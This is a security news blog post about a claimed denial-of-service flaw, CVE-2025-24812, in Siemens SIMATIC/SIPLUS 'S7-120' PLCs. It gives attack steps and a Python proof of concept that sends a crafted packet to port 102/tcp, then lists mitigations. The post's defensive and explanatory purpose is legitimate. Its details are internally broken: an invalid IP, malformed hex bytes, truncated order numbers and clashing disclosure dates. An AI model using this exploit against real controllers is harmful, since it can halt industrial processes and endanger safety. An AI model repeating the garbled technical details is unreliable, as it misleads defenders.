CVE CyberSecurity Database News

CVE-2025-24812 - Denial of Service Vulnerability in Siemens SIMATIC & SIPLUS S7-120 PLCs (Port 102/tcp)

Poster -

In June 2024, a new vulnerability was revealed affecting a broad range of Siemens SIMATIC S7-120 and SIPLUS S7-120 PLCs (Programmable Logic Controllers). This issue, tracked as CVE-2025-24812, can let a remote attacker crash a vulnerable device simply by sending specially crafted packets to port 102/tcp—potentially stopping industrial processes, automation systems, or even critical infrastructure in their tracks.

This long-read post gives a simplified walkthrough of what the vulnerability is, which PLC models are affected, how the exploit works, and ways to defend against it.

Impact: Denial of Service (PLC hangs or reboots)

- Port: 102/tcp (ISO-TSAP, S7 protocol)

Background

SIMATIC S7-120 PLCs are widely used to control industrial machinery, factory automation, and essential infrastructure across the globe. These devices communicate using the S7 protocol over port 102/tcp, which is how engineers upload code, monitor systems, and manage the device.

The Vulnerability

Certain versions of the firmware do not correctly process specially crafted network packets sent to port 102/tcp (reserved for S7 comms). This means an unauthenticated attacker can render the device unresponsive (DoS) by sending malformed or specially constructed data.

A (non-exhaustive) table of affected mainline devices, all versions before V4.7

| Device Type | Order Number |
|------------------|---------------------------------|
| S7-120 CPU 1211C AC/DC/Rly | 6ES7211-1BE40-XB |
| S7-120 CPU 1211C DC/DC/DC | 6ES7211-1AE40-XB |
| S7-120 CPU 1211C DC/DC/Rly | 6ES7211-1HE40-XB |
| S7-120 CPU 1212C AC/DC/Rly | 6ES7212-1BE40-XB |
| S7-120 CPU 1212C DC/DC/DC | 6ES7212-1AE40-XB |
| ... (many more, see intro) | ... (see list above) |

> *Tip: SIPLUS variants are hardened for harsh conditions but use the same firmware.*

ALL of these are vulnerable if running firmware less than V4.7.

Technical Summary

PLCs implement a network protocol (S7) on port 102/tcp. For this vulnerability, attackers create a malformed or specially crafted S7 packet—the device’s firmware does not properly validate or parse it, leading to a hang or crash.

Locate the PLC on the network. (PLC must be reachable, e.g., not behind a strict firewall.)

2. Craft a malformed/malicious S7/ISO-TSAP packet.
3. Send to port 102/tcp.

PLC crashes, restarts, or otherwise becomes unresponsive.

No login or hardware required—just network access.

Sample Exploit (Proof of Concept)

Here’s a simple Python snippet using socket to send a malformed S7 CONNECT packet to port 102 of a PLC (replace PLC_IP with the device IP):

import socket

PLC_IP = '192.168..100'  # Replace with target PLC IP
PORT = 102

# Basic S7 connection packet (malformed on purpose for DoS)
malicious_packet = bytes.fromhex(
    '03 00 00 16 11 e 00 00 00 01 00 c1 02 01 00 c2 02 01 02 c 01 09'
    # (You can fuzz or modify this to suit)
)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((PLC_IP, PORT))
    s.sendall(malicious_packet)
    print(f"[+] Malicious packet sent to {PLC_IP}:102")

If the PLC is vulnerable, it will stop responding (requiring manual reboot or power cycle).
Warning: Never run this on production or systems you do not own!

Real-World Impact

- Industrial Automation: If a PLC is crashed, controlled machines/processes can halt—affecting manufacturing lines, logistics, etc.

Critical Infrastructure: Water, power, and building controls could go down.

- Safety: In some settings, unexpected PLC downtime could threaten worker safety or damage equipment.

Update Firmware:

Siemens released firmware v4.7 and later that fix the bug. Always update to latest supported version.

Firewall Rules:

Block port 102/tcp from unauthorized sources. Allow only trusted engineering clients.

Prepare procedures for PLC restoration and rapid isolation if an attack is detected.

## References / More Reading

Siemens Security Advisory (Official)

- SSA-123601: Vulnerability in SIMATIC S7-120 and SIPLUS S7-120 CPUs - CVE-2025-24812

NVD Database Entry

- CVE-2025-24812 --- NVD

S7 Protocol Reference

- Official S7 Protocol docs (archived)

Conclusion

CVE-2025-24812 is a simple but powerful denial of service flaw in widely deployed Siemens PLCs. A single unauthenticated packet can halt operations, making it a serious risk wherever these devices are in use. If you run S7-120 or SIPLUS S7-120 CPUs—update your firmware and harden your network today.

Industrial security isn’t just about patching Windows! PLCs deserve your attention too.


*If you want more technical details or vendor updates, check out the links above or Siemens’ official CERT advisories.*

Timeline

Published on: 02/11/2025 11:15:17 UTC